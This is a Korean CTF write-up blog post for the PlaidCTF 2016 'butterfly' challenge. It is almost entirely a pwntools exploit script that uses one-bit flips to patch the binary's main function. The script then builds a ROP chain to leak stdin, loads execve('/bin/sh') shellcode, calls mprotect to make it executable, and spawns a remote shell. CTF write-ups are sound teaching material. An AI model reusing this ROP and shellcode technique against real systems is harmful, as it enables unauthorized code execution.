PlaidCTF 2016 butterfly

Games/CTF 2016. 4. 19. 19:49

1bit flip 을 하게 해주는 문제.

main 함수에 명령어 몇개 바꿔서 ROP 하면됨.

hahah 님의 빠른 풀이전략을 듣고 익스코드 작성.



from pwn import *

import time

context.arch = 'amd64' # i386 / arm


SH = "\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"

# recvuntil sendline, pack, recv, send

r = remote('butterfly.pwning.xxx', 9999)

#r = process(['stdbuf', '-o', '0', '-i', '0', './butterfly'])

raw_input('attach')

# start pwn.


# 0x48 -> 0x08

main = 0x400788

TARGET1 = '33571614'.ljust(40, ' ') #33571608 + ?

TARGET1 += pack(main)

print r.recv(1000)


r.sendline(TARGET1)


# create rdx gadget

TARGET22 = '33571616'.ljust(40, ' ')

TARGET22 += pack(main)

print r.recv(1000)

r.sendline(TARGET22)


# change fgets size

TARGET2 = '33570343'.ljust(40, ' ')

TARGET2 += pack(main)


print r.recv(1000)


r.sendline(TARGET2)


# jne -> je

TARGET32 = '33571544'.ljust(40, ' ')

'''

pattern 5fc3 found at 0x4008f3

POP RDI; RET;


   0x4007c8 <main+208>: pop    %rsi

   0x4007c9 <main+209>: pop    %r15

   0x4007cb <main+211>: pop    %rbp

   0x4007cc <main+212>: retq  


   0x00000000004007c6 <+206>: pop    %rdx

   0x00000000004007c7 <+207>: pop    %r14

   0x00000000004007c9 <+209>: pop    %r15

   0x00000000004007cb <+211>: pop    %rbp

   0x00000000004007cc <+212>: retq 

'''


fgets = 0x400640

puts = 0x400600

stdin_got = 0x600d30

poprdi = 0x4008f3

poprsi = 0x400866

poprdx = 0x400864

mprotect = 0x400660


raw_input('4')

# start full ROP. fgets

TARGET32 += pack(poprdi)

TARGET32 += pack(stdin_got)

TARGET32 += pack(puts)

TARGET32 += pack(main)

print r.recv(1000)

raw_input()

r.sendline(TARGET32)

raw_input()

leak = r.recv(1000)

print leak

stdin = int(leak.split('\n')[1][::-1].encode('hex'), 16)

print 'stdin : {0}'.format(hex(stdin))


TARGET3 = '33571864'.ljust(40, '#')


TARGET3 += pack(poprdi)

TARGET3 += pack(0x600800) # shellcode location

TARGET3 += pack(poprsi)

TARGET3 += pack(0x80)

TARGET3 += pack(0)

TARGET3 += pack(0)

TARGET3 += pack(poprdx)

TARGET3 += pack(stdin)

TARGET3 += pack(0)

TARGET3 += pack(0)

TARGET3 += pack(0)

TARGET3 += pack(fgets)

TARGET3 += pack(main)

r.sendline(TARGET3)

time.sleep(1)

r.sendline(SH)

time.sleep(.5)

print r.recv(1000)

time.sleep(.5)



TARGET4 = '33571864'.ljust(40, '#')

TARGET4 += pack(poprdi)

TARGET4 += pack(0x600000)

TARGET4 += pack(poprsi)

TARGET4 += pack(0x1000)

TARGET4 += pack(0)

TARGET4 += pack(0)

TARGET4 += pack(poprdx)

TARGET4 += pack(7)

TARGET4 += pack(0)

TARGET4 += pack(0)

TARGET4 += pack(0)

TARGET4 += pack(mprotect)

TARGET4 += pack(0x600800) # jump to shellcode

r.sendline(TARGET4)


# get shell?

r.interactive()


'Games > CTF' 카테고리의 다른 글

ASIS CTF 2016 books  (0) 2016.05.11
ASIS CTF 2016 feap  (0) 2016.05.11
PlaidCTF 2016 butterfly  (0) 2016.04.19
PlaidCTF 2016 fixedpoint  (0) 2016.04.19
PlaidCTF 2016 pzip  (0) 2016.04.19
CAMPCTF 2015 dkm  (0) 2015.11.19
Posted by daehee87

댓글을 달아 주세요